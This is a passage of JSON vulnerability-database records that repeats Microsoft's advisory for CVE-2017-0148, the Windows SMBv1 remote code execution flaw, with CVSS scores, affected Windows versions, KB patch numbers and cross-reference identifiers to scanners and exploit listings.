"AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-16T11:28:55", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-14T04:52:34", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-14T04:52:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KB3210720", "KBMS16-110, 3187754", "KB4012214", "KB3210721", "KB4012606", "KB3213986", "KB4012213", "KB4012215", "KB3212646", "KB3205409", "KB4012212", "KB4013198", "KB4012217", "KB4012216", "KB4012598", "KB4013429", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-16T11:28:55", "differentElements": ["msAffectedSoftware"], "edition": 47}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-16T12:44:29", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012606", "KB4012214", "KB3213986", "KB3212646", "KB4012212", "KB4012213", "KB3210720", "KB4013198", "KB3205401", "KB4013429", "KB3177186", "KB4012217", "KB3210721", "KB4012215", "KB4012598", "KB3205409", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-16T12:44:29", "differentElements": ["msAffectedSoftware"], "edition": 48}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-17T02:51:36", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB3210721", "KB3177186", "KB3205401", "KB4012215", "KB3210720", "KB4012216", "KB4013198", "KB4012214", "KB4013429", "KB3205409", "KB3212646", "KB4012212", "KB4012606", "KB3213986", "KBMS16-110, 3187754", "KB4012598", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 